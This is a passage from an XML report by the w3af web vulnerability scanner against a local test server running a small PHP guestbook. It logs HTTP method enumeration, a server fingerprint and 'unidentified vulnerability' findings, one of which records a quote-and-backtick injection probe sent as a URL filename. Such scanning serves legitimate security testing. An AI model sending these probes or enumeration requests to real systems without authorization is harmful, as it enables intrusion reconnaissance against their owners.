                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="381">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="381">
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;&lt;/p&gt;
        &lt;p&gt;&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;56&lt;/p&gt;
        &lt;p&gt;Hello World&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="481">
                <httprequest>
                    <status>CHECKOUT http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="481">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="511">
                <httprequest>
                    <status>PROPFIND http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="511">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="561">
                <httprequest>
                    <status>SUBSCRIBE http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="561">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="574">
                <httprequest>
                    <status>LOCK http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="574">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="597">
                <httprequest>
                    <status>MKDIR http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="597">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="731">
                <httprequest>
                    <status>MERGE http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="731">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="757">
                <httprequest>
                    <status>UNLOCK http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="757">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="779">
                <httprequest>
                    <status>PROPPATCH http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="779">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="843">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="0" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                </httprequest>
                <httpresponse id="843">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="853">
                <httprequest>
                    <status>COPY http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="853">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="862">
                <httprequest>
                    <status>TRACE http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="862">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="880">
                <httprequest>
                    <status>PATCH http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="880">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="906">
                <httprequest>
                    <status>UNSUBSCRIBE http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="906">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="922">
                <httprequest>
                    <status>MKACTIVITY http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="922">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </information>
    <information id="[1]" name="Webserver fingerprint" plugin="hmap" url="None">
        <description>The most accurate fingerprint for this HTTP server is: &quot;JigSaw 2.2.2 (Solaris 8)&quot;. This information was found in the request with id 1.</description>
        <http-transactions>
            <http-transaction id="1">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="1">
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </information>
    <information id="[232, 291, 317]" name="Unidentified vulnerability" plugin="generic" url="http://192.168.0.116:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29">
        <description>An unidentified vulnerability was found at: &quot;http://192.168.0.116:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29&quot;, using HTTP method GET. The modified parameter was the URL filename, with value: &quot;d'kc&quot;z'gj'&quot;**5*(((;-*`)&quot;. This vulnerability was found in the requests with ids 232, 291 and 317.</description>
        <http-transactions>
            <http-transaction id="232">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="232">
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;Type your pseudonyme and message!&lt;/p&gt;
    &lt;form action='/post' method='post'&gt;
        &lt;input type='text' name='pseudo' /&gt;
        &lt;input type='textarea' name='message' /&gt;
        &lt;input type='submit' value='ok' /&gt;
    &lt;/form&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="291">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/XWPfLmxj HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="291">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="317">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="317">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </information>
    <information id="[232, 291, 365]" name="Unidentified vulnerability" plugin="generic" url="http://192.168.0.116:31337/">
        <description>An unidentified vulnerability was found at: &quot;http://192.168.0.116:31337/&quot;, using HTTP method GET. The modified parameter was the URL filename, with value: &quot;&quot;. This vulnerability was found in the requests with ids 232, 291 and 365.</description>
        <http-transactions>
            <http-transaction id="232">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="232">
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;Type your pseudonyme and message!&lt;/p&gt;
    &lt;form action='/post' method='post'&gt;
        &lt;input type='text' name='pseudo' /&gt;
        &lt;input type='textarea' name='message' /&gt;
        &lt;input type='submit' value='ok' /&gt;
    &lt;/form&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="291">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/XWPfLmxj HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="291">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="365">
                <httprequest>
